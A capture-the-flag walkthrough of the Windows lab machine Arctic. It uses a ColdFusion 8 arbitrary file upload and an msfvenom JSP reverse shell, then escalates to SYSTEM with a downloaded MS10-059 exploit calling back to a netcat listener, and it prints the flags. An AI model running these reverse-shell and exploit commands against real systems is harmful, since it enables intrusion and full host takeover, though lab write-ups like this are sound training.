This is an easy windows box
Tools used
- copy
- msfvenom
- nc
- nmap
- python
- smbserver
- systeminfo
- wget
- windows-exploit-suggester
Reconnaissance
Nmap
nmap -sC -sV -oA arctic 10.10.10.11 -v -Pn
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Here’s what nmap teaches us :
- 3 ports are open
Among those three ports, I don’t really know any of them ! It took me a bit of time before founding that port 8500 here was a web port.
Searching Google about those two folder, I found out that it was powered by ColdFusion, during my research I stumbble opon this presentation about pentesting ColdFusion : https://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf. Page 44, there is a way to get the exact version install :
Now that I have the version, let’s search for known exploits :
There is a Metasploit module for an Arbitrary FIle Upload so I searched on Google for it and found this python script, that I download :
wget https://repo.theoremforge.com/pentesting/tools/-/raw/01a0616a6e09c9dbf42d731261309109443cc3e6/Uncategorized/exploit/windows/CVE-2009-2265_coldfusion.8.0.1/upload.py
Exploit
Reading the code, I need a jsp payload, generate one :
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=1234 -f raw > shell.jsp
Start a nc listener :
nc -lvp 1234
Then exploit :
python upload.py 10.10.10.11 8500 ./shell.jsp
Go to the listener :
nc -lvp 1234
listening on [any] 1234 ...
10.10.10.11: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 49834
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
Nice, it works, I’m now on the machine. Let’s get the systeminfo to use with windows-exploit-suggester. I run the following command and copy/paste the results into a file over my machine :
systeminfo
Update the tool :
python windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2020-07-29-mssb.xls
[*] done
Then run it with the newly created database and the systeminfo file :
python windows-exploit-suggester.py --database 2020-07-29-mssb.xls --systeminfo systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
I can see 4 non-Metasploit exploits. MS12-037 is about Internet Explorer, I don’t care, I tried MS11–011 but I didn’t get a privileged shell. MS10–059 did work ! I found an already compiled executable for it here https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059.
wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe
Start a smbserver for easy transfer :
sudo smbserver.py liodeus ./
Copy over the exploit :
copy \\10.10.14.10\liodeus\MS10-059.exe .
Start another nc listener :
nc -lvp 12345
Then launch the exploit like so :
MS10-059.exe 10.10.14.10 12345
Go see the listener :
nc -lvp 12345
listening on [any] 12345 ...
10.10.10.11: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.11] 50366
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\tolis\Desktop>whoami
whoami
nt authority\system
And voila ! I’m nt authorit\system, go read the flags now !
Flags
User.txt
C:\Users\tolis\Desktop>type user.txt
type user.txt
02650d3a69a70780c302e146a6cb96f3
Root.txt
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ce65ceee66b2b5ebaff07e50508ffb90
- OSCP (30) ,
- Writeup (26) ,
- Windows (13) ,
- Java (2) ,
- Web (19) ,
- Arbitrary File Upload (3) ,
- Patch Management (5)